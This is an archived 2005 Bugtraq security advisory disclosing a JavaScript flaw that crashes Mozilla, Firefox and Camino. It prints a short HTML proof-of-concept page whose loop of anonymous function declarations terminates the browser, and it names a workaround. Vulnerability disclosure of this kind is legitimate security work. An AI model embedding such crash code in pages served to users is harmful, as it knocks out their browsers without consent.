Bugtraq mailing list archives
Mozilla Multiple Product JavaScript Issue
From: Kurczaba Associates Advisories <advisories () kurczaba com>
Date: Wed, 29 Jun 2005 15:23:56 -0400
Mozilla Multiple Product JavaScript Issue http://www.kurczaba.com/html/security/0506241.htm ------------------------------------------------- Vendor: Mozilla (http://www.mozilla.org) Vulnerable Software: Mozilla 1.7.8 Firefox 1.0.4 Camino 0.8.4 Vulnerability/Exploit:By using a specially crafted JavaScript function, it is possible to crash the above named browsers. The script can be executed both with and without user intervention.
Proof of Concept: -----START of PoC----- <html> <head> </head> <body> <script language="JavaScript"> //Run the function 20000 times for (a = 0; a <= 20000; a++) { //Here is the special code that terminates the browser function(){}; } //Displays an alert to notify the user if the browser is not vulnerable. alert("Good news - Your browser is not vulnerable."); </script> </body> </html> -----END of PoC----- Proof of Concept (Online): Manual: http://www.kurczaba.com/html/security/0506241_poc.htm Automatic: http://www.kurczaba.com/html/security/0506241_poc2.htm Workaround: Disable JavaScript Date Discovered: June 14, 2005 Severity: Low Credit: Paul Kurczaba
Current thread:
- Mozilla Multiple Product JavaScript Issue Kurczaba Associates Advisories (Jun 29)